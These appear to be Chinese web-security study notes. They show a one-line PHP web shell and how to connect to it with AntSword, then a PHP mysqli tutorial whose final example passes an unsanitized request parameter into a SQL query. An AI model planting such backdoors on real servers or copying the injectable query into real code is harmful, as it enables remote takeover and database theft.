php简单后门实现
代码
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>easybackdoor</title>
</head>
<body><?php$_GET['x']($_GET['y']);?></body>
</html>
效果
使用蚁剑连接
<?php$_GET['x']($_POST['y']);?>
使用hackbar传参,前面传assert
添加蚁剑数据,需要选择base64
连接成功
php连接数据库
相关函数
| 函数名 | 作用 |
|---|---|
| mysqli_connect() | 与MySQL 数据库建立连接。 |
| mysqli_close() | 关闭与MYSQL 数据库建立的连接。 |
| mysqli_connect_errno() | 与MySQL 数据库建立连接时,发生错误时的错误编号。 |
| mysqli_connect_error() | 与MySQL 数据库建立连接时,发生错误时的错误信息。 |
| mysqli_query() | 执行SQL 语句。 |
| mysqli_errno() | 执行SQL 语句时,发生错误的编号。 |
| mysqli_error() | 执行SQL 语句时,发生错误的信息。 |
| mysqli_fetch_assoc() | 从结果集对象中取数据,按条取数据。 |
| 函数 | 说明 |
|---|---|
| mysqli_fetch_row() | 以索引数组的方式获取一条记录的数据 |
| mysqli_fetch_assoc() | 以关联数组的方式获取一条记录的数据 |
| mysqli_fetch_array() | 以索引数组或关联数组的方式获取一条记录的数据 |
| mysqli_fetch_all() | 以索引数组或关联数组的方式获取全部记录的数据 |
| mysqli_num_rows() | 获取结果集对象中数据条数 |
| mysqli_free_result() | 释放与一个结果集合相关的内存 |
交互过程
- 建立与MySQL 链接。
- 执行SQL 语句,返回结果集对象。
- 从结果集对象中取数据。
- 关闭与MySQL 链接
建立链接
$db_host = "127.0.0.1";
$db_user = "root";
$db_pass = "root";
$db_name = "bbs";$link = @mysqli_connect($db_host, $db_user, $db_pass, $db_name);
如果链接成功,返回object(mysqli)1;否则,返回bool(false)。
$link 是对象类型的变量,相当于一个"令牌"。
捕获连接错误
- 错误编号
- 错误详情
if(!$link){exit("[".mysqli_connect_errno()."] ".mysqli_connect_error());
}
关闭链接
mysqli_close($link);
执行SQL
单条SQL 语句执行
$sql = "select * from users1;";$results = mysqli_query($link, $sql);
如果SQL 语句正常执行,就会返回对象类型object(mysqli_result)#2 的数据;否则,bool(false)。
对于insert,delete,update 等不会返回数据的SQL 语句,在执行没有错误时将返回true。对于返回数据的SQL 语句执行成功的时候会返回结果集对象,可以使用操作结果集对象的函数来从中获取数据。
SQL 错误
如果在执行SQL 语句的时候发生错误,mysqli_query 将返回false。可以使用以下函数捕获错误原因:
if(!$results){exit("[".mysqli_errno($link)."] ".mysqli_error($link));
}
完整代码实现
执行结果,遍历输出该表并写入表格
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>mysqlconnect</title>
</head>
<body><?php$db_host="127.0.0.1";$db_user="root";$db_pass="root";$db_name="bbs";$link=@mysqli_connect($db_host, $db_user, $db_pass, $db_name);if(!$link){echo "link error<br>"."[".mysqli_connect_errno()."]".mysqli_connect_error();exit();}else{echo "link access";}$sql="select * from message;";$results=mysqli_query($link,$sql);if(!$results){echo "error,plz retry<br>"."[".mysqli_errno($link)."]".mysqli_error($link);}echo "<table border=2>";echo "<tr><td>id</td><td>uid</td><td>title</td><td>content</td></tr>";while($result=mysqli_fetch_assoc($results)){echo "<tr>";foreach($result as $k => $v){echo "<td>";echo $v;echo "</td>";}echo "</tr>";}echo "</table>";mysqli_close($link); ?></body>
</html>
可以实现根据id查询到数控,并且返回的有用户名了
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>mysqlconnect</title>
</head>
<body><?php$db_host="127.0.0.1";$db_user="root";$db_pass="root";$db_name="bbs";$link=@mysqli_connect($db_host, $db_user, $db_pass, $db_name);if(!$link){echo "link error<br>"."[".mysqli_connect_errno()."]".mysqli_connect_error();exit();}else{echo "link access";}$id=isset($_REQUEST['id'])?$_REQUEST['id']:1;$sql="select m.id,u.username,m.title,m.content from message m,user u where u.id=m.uid and m.id=$id;";$results=mysqli_query($link,$sql);if(!$results){echo "error,plz retry<br>"."[".mysqli_errno($link)."]".mysqli_error($link);}echo "<table border=2>";echo "<tr><td>id</td><td>username</td><td>title</td><td>content</td></tr>";while($result=mysqli_fetch_assoc($results)){echo "<tr>";foreach($result as $k => $v){echo "<td>";echo $v;echo "</td>";}echo "</tr>";}echo "</table>";mysqli_close($link); ?></body>
</html>
)
